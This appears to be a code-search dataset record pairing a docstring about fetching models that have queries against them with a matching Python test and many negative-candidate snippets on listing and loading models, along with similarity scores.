a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(self, app_label, model_name,\n seed_cache=True, only_installed=True):\n if seed_cache:\n self._populate()\n if only_installed and app_label not in self.app_labels:\n return None\n return self.app_models \\\n .get(app_label, SortedDict()) \\\n .get(model_name.lower())", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def availablemodels(self):\n return self.__models.keys()", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "async def list_models(\n list_models_request: ListModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/list_models endpoint\")\n logging.debug(f\"Request: {list_models_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().list_model_controller(\n request=list_models_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/list_models endpoint: {error}\")\n raise error", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(source: str, supported_model_name: str, model_id: str):\n connector = __get_connector(source)\n supported_model = __get_supported_model(supported_model_name)\n\n try:\n model = connector.get(supported_model, model_id)\n return __parse_response(source, model)\n except Exception as e:\n abort(500, e)", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def list_models():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_models\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)", "def get_models_from_table_names(table_names, force=None):\n models = []\n errors = []\n for table_name in table_names:\n try:\n models.append(\n get_model_from_table_name(table_name)\n )\n except (\n IncorrectTableNameException,\n ModelDoesNotExistException\n ) as exc:\n if not force:\n raise exc\n errors.append(exc.args)\n return models, errors", "def load_models_by_type(model_type):\n\n # loading the models for each language supported\n return [(lang_id, load_model(lang_id, model_type)) for lang_id in language_id_to_code_mapper]", "def load_best_model_json():\n with open(qualify_full_filepath(f\"models.json\", HERE), \"r\") as infile:\n models = json.load(infile)\n return models", "def _get_models_from_metafile(dir: str):\n meta_indexes = load(osp.join(dir, 'model-index.yml'))\n for meta_path in meta_indexes['Import']:\n # meta_path example: mmcls/.mim/configs/conformer/metafile.yml\n meta_path = osp.join(dir, meta_path)\n metainfo = load(meta_path)\n yield from metainfo['Models']", "def find_models(page_index=0):\n search_query = {\n 'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def iter_models(self):\n return iter(self.model_list)", "def get_model(params):\r\n module_name, class_name = params.model.name.rsplit('.', 1)\r\n i = importlib.import_module(module_name)\r\n return getattr(i, class_name)", "def load_models(model_base_name=None, num_voices=4):\n models = []\n for voice_index in range(num_voices):\n model_path_name = os.path.join(PACKAGE_DIR,\n 'models/' + model_base_name+ '_' + str(\n voice_index))\n model = load_model(model_path_name)\n model.compile(optimizer='adam',\n loss={'pitch_prediction': 'categorical_crossentropy'\n },\n metrics=['accuracy'])\n models.append(model)\n return models", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def _load_predictiveModel(self):\n # type: () -> None\n\n for model in self.__MODELS:\n if isinstance(self._model, model):\n self._classLabels = self._model.classes_ # Assign the classes available in the classifier to the labels container.\n return\n\n raise InvalidModelException(\n \"Did not recieve a model that was one of the expected types. Use model_types() to see supported models. Recieved type {0}\".format(\n type(self._model)))", "def check_models_ready(self):\n if not self.models_ready:\n raise RuntimeError(\"Models aren't loaded yet.\")", "def load_model(seriesname):\n LOG.debug(\"Calling load_model() with the following arguments:\")\n LOG.debug(\"seriesname = %s\"%seriesname)\n \n result = []\n return result", "def _request_model(self, instance, success, get_embedded=True):\n coll = self.get_collection('_model')\n if get_embedded:\n callback = partial(self._get_embedded_model_names,\n instance=instance,\n success=success)\n else:\n callback = success\n\n try:\n instance['_model']\n except KeyError:\n raise tornado.web.HTTPError(400, 'Missing model key')\n coll.find_one({'_id': instance['_model']},\n callback=callback)", "def test_model_runs(self):\n\n for m in self.models:\n self.assertTrue(m is not None)\n self.assertTrue(isinstance(m, topic_model.TopicModel))", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def test_load_model_method(self):\n # arrange\n # instantiating the model manager class\n model_manager = ModelManager()\n\n # adding the model\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model_object = None\n # accessing the MLModelMock model object\n try:\n model_object = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n print_tb(e)\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(model_object is not None)", "def init_models(self):\n from ron import Application\n from ron.models.basemodel import BaseModel\n if self.models == None or not Application().db:\n return\n models_namespace = self.__namespace + \".models\" # TODO: allow customize this\n try:\n models_package = import_module(models_namespace)\n except:\n models_package = None\n if models_package:\n models_modules = self._get_package_modules(models_package)\n for model_name in models_modules:\n imported_model = import_module('.' + model_name, package=models_namespace)\n for i in dir(imported_model):\n attribute = getattr(imported_model, i)\n if inspect.isclass(attribute) and issubclass(attribute, BaseModel):\n self.models.append(attribute)\n Application().db().database.create_tables(self.models)", "def models(self):\n return self.config.models()", "def load_models(model_dirs):\n models = []\n for directory in model_dirs:\n filenames = os.listdir(directory)\n for filename in filenames:\n if filename.endswith('.pth'):\n model_path = os.path.join(directory, filename)\n model = get_model()\n target_device = None if torch.cuda.is_available() else 'cpu'\n model.load_state_dict(torch.load(model_path, map_location=target_device))\n models.append(model)\n return models", "def get_model(self, id):\n if id not in self._models:\n raise Exception(f'model with the id {id} does not exist')\n return self._models[id]", "def check_models(*, schemas: _oa_types.Schemas) -> types.TModels:\n not_constructables = iterate.not_constructable(schemas=schemas)\n not_constructables_result = map(\n lambda args: (args[0], check_model(schemas, args[1])), not_constructables\n )\n return dict(not_constructables_result)", "def GetModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models" ]
[ "0.75194955", "0.7327567", "0.69435924", "0.67743224", "0.67731684", "0.66390353", "0.6595562", "0.6590047", "0.64084816", "0.6316313", "0.6267025", "0.62651926", "0.626041", "0.6233475", "0.6200443", "0.61957514", "0.61935633", "0.61921066", "0.61672646", "0.61589247", "0.6154951", "0.6127301", "0.6122401", "0.6119595", "0.60895294", "0.6084304", "0.6076584", "0.60558337", "0.60204977", "0.60099065", "0.6000378", "0.59894866", "0.5973256", "0.59708786", "0.59646904", "0.5959054", "0.59453535", "0.5932688", "0.59304863", "0.5917831", "0.59142953", "0.5913386", "0.59090734", "0.5888891", "0.58860165", "0.58712643", "0.58348227", "0.5808802", "0.5807494", "0.5796432", "0.5787363", "0.5786724", "0.5774374", "0.5767773", "0.5763746", "0.5724312", "0.5718138", "0.57111436", "0.57084054", "0.5691953", "0.5680172", "0.5664144", "0.56401724", "0.56401724", "0.5574124", "0.5539155", "0.5536057", "0.5520777", "0.5517591", "0.550578", "0.5502662", "0.5495101", "0.5493489", "0.5487742", "0.54824877", "0.54764974", "0.54740924", "0.54740924", "0.54664975", "0.54634917", "0.5454626", "0.5453488", "0.54526365", "0.5449064", "0.5448379", "0.544452", "0.543344", "0.54320335", "0.5430745", "0.54078996", "0.5407478", "0.5388507", "0.5386578", "0.5386476", "0.5382068", "0.5374689", "0.5372811", "0.53641796", "0.5361513", "0.5361345" ]
0.666128
5
fetcher.get_used_models() should return models that have queries against them.
def test_get_used_models(fc: fetcher.Fetcher, test_model): used_models = fc.get_used_models() assert isinstance(used_models, dict) assert len(used_models) > 0 assert all(type(model_name) == str for model_name in used_models.keys()) assert all(type(query_count) == int for query_count in used_models.values()) assert test_model["name"] in used_models.keys()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def availablemodels(self):\n return self.__models.keys()", "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def get_models(self):\n self.load()\n return self._models", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def get_available_entities_models():\n return ['concat', 'bahdanau', 'luong']", "def get_models_query():\n query = db.session.query(Products.model).distinct()\n return query", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def test_coupledmodels_get(self):\n pass", "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def models(self):\n return self.config.models()", "def pending_models(self):\n return self._pending_models", "def requires_model_loading(self):\n return self.requires_loaded_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def get_live_tracked_models(self, model_class):\n return self.update_models[model_class] + self.create_models[model_class]", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def models(self):\n return self._base.classes", "def models() -> list[str]:\n return list(models_url.keys())", "def models(self, model=None):\n for query in self.__queries:\n if isinstance(query, orb.Query):\n yield query.model(model)\n else:\n for model in query.models(model):\n yield model", "def peak_all_models(self) -> List:\n models = list(self.meta.name)\n print(models)\n return models", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def load_all_queryset(self):\n return self.get_model()._default_manager.all()", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def get_models(self):\n return self.P, self.Q", "def usage_for_model(self, model, counts=False, min_count=None, filters=None, extra=None):\n if extra is None: extra = {}\n if filters is None: filters = {}\n\n if not parse_lookup:\n # post-queryset-refactor (hand off to usage_for_queryset)\n queryset = model._default_manager.filter()\n for f in filters.items():\n queryset.query.add_filter(f)\n usage = self.usage_for_queryset(queryset, counts, min_count, extra)\n else:\n # pre-queryset-refactor\n extra_joins = ''\n extra_criteria = ''\n params = []\n if len(filters) > 0:\n joins, where, params = parse_lookup(filters.items(), model._meta)\n extra_joins = ' '.join(['%s %s AS %s ON %s' % (join_type, table, alias, condition)\n for (alias, (table, join_type, condition)) in joins.items()])\n extra_criteria = 'AND %s' % (' AND '.join(where))\n usage = self._get_usage(model, counts, min_count, extra_joins, extra_criteria, params, extra)\n\n return usage", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def _get_includes(self):\n models = []\n op, targets = self.get_data()\n if op == self.OPERATOR.NOT:\n return models\n\n for t in targets:\n if isinstance(t, ObjectModel):\n models += [t]\n elif isinstance(t, TargetingCriterion):\n if op != self.OPERATOR.NOT:\n models += t._get_includes()\n\n return models", "def count_models(self):\n return len(self.model_list)", "def manager(model):\n return model.objects", "def enabled_models(with_common=True):\n return targeted.enabled_models(with_common) + untargeted.enabled_models(with_common)", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def iter_models(self):\n return iter(self.model_list)", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "def _get_usage(self, model, counts=False, min_count=None, extra_joins=None, extra_criteria=None, params=None, extra=None):\n if min_count is not None: counts = True\n\n model_table = qn(model._meta.db_table)\n model_pk = '%s.%s' % (model_table, qn(model._meta.pk.column))\n tag_columns = self._get_tag_columns()\n \n if extra is None: extra = {}\n extra_where = ''\n if 'where' in extra:\n extra_where = 'AND ' + ' AND '.join(extra['where'])\n \n query = \"\"\"\n SELECT DISTINCT %(tag_columns)s%(count_sql)s\n FROM\n %(tag)s\n INNER JOIN %(tagged_item)s\n ON %(tag)s.id = %(tagged_item)s.tag_id\n INNER JOIN %(model)s\n ON %(tagged_item)s.object_id = %(model_pk)s\n %%s\n WHERE %(tagged_item)s.content_type_id = %(content_type_id)s\n %%s\n %(extra_where)s\n GROUP BY %(tag)s.id, %(tag)s.name\n %%s\n ORDER BY %(tag)s.%(ordering)s ASC\"\"\" % {\n 'tag': qn(self.model._meta.db_table),\n 'ordering': ', '.join(qn(field) for field in self.model._meta.ordering),\n 'tag_columns': tag_columns,\n 'count_sql': counts and (', COUNT(%s)' % model_pk) or '',\n 'tagged_item': qn(self.intermediary_table_model._meta.db_table),\n 'model': model_table,\n 'model_pk': model_pk,\n 'extra_where': extra_where,\n 'content_type_id': ContentType.objects.get_for_model(model).pk,\n }\n\n min_count_sql = ''\n if min_count is not None:\n min_count_sql = 'HAVING COUNT(%s) >= %%s' % model_pk\n params.append(min_count)\n\n cursor = connection.cursor()\n cursor.execute(query % (extra_joins, extra_criteria, min_count_sql), params)\n tags = []\n for row in cursor.fetchall():\n t = self.model(*row[:len(self.model._meta.fields)])\n if counts:\n t.count = row[len(self.model._meta.fields)]\n tags.append(t)\n return tags", "def _get_usage(self, model, counts=False, min_count=None, extra_joins=None, extra_criteria=None, params=None):\r\n if min_count is not None: counts = True\r\n\r\n model_table = qn(model._meta.db_table)\r\n model_pk = '%s.%s' % (model_table, qn(model._meta.pk.column))\r\n query = \"\"\"\r\n SELECT DISTINCT %(tag)s.id, %(tag)s.name%(count_sql)s\r\n FROM\r\n %(tag)s\r\n INNER JOIN %(tagged_item)s\r\n ON %(tag)s.id = %(tagged_item)s.tag_id\r\n INNER JOIN %(model)s\r\n ON %(tagged_item)s.object_id = %(model_pk)s\r\n %%s\r\n WHERE %(tagged_item)s.content_type_id = %(content_type_id)s\r\n %%s\r\n GROUP BY %(tag)s.id, %(tag)s.name\r\n %%s\r\n ORDER BY %(tag)s.name ASC\"\"\" % {\r\n 'tag': qn(self.model._meta.db_table),\r\n 'count_sql': counts and (', COUNT(%s)' % model_pk) or '',\r\n 'tagged_item': qn(TaggedItem._meta.db_table),\r\n 'model': model_table,\r\n 'model_pk': model_pk,\r\n 'content_type_id': ContentType.objects.get_for_model(model).pk,\r\n }\r\n\r\n min_count_sql = ''\r\n if min_count is not None:\r\n min_count_sql = 'HAVING COUNT(%s) >= %%s' % model_pk\r\n params.append(min_count)\r\n\r\n cursor = connection.cursor()\r\n cursor.execute(query % (extra_joins, extra_criteria, min_count_sql), params)\r\n tags = []\r\n for row in cursor.fetchall():\r\n t = self.model(*row[:2])\r\n if counts:\r\n t.count = row[2]\r\n tags.append(t)\r\n return tags", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_object_models(self):\n parser = WorldParser(self.world_fpath)\n return parser.models", "def usage_for_model(self, model, counts=False, min_count=None, filters=None):\r\n if filters is None: filters = {}\r\n\r\n if not parse_lookup:\r\n # post-queryset-refactor (hand off to usage_for_queryset)\r\n queryset = model._default_manager.filter()\r\n for f in filters.items():\r\n queryset.query.add_filter(f)\r\n usage = self.usage_for_queryset(queryset, counts, min_count)\r\n else:\r\n # pre-queryset-refactor\r\n extra_joins = ''\r\n extra_criteria = ''\r\n params = []\r\n if len(filters) > 0:\r\n joins, where, params = parse_lookup(filters.items(), model._meta)\r\n extra_joins = ' '.join(['%s %s AS %s ON %s' % (join_type, table, alias, condition)\r\n for (alias, (table, join_type, condition)) in joins.items()])\r\n extra_criteria = 'AND %s' % (' AND '.join(where))\r\n usage = self._get_usage(model, counts, min_count, extra_joins, extra_criteria, params)\r\n\r\n return usage", "def get_models(automaker, year):\n return set([row[\"model\"] for row in data\n if row[\"automaker\"] == automaker and\n row[\"year\"] == year])", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = 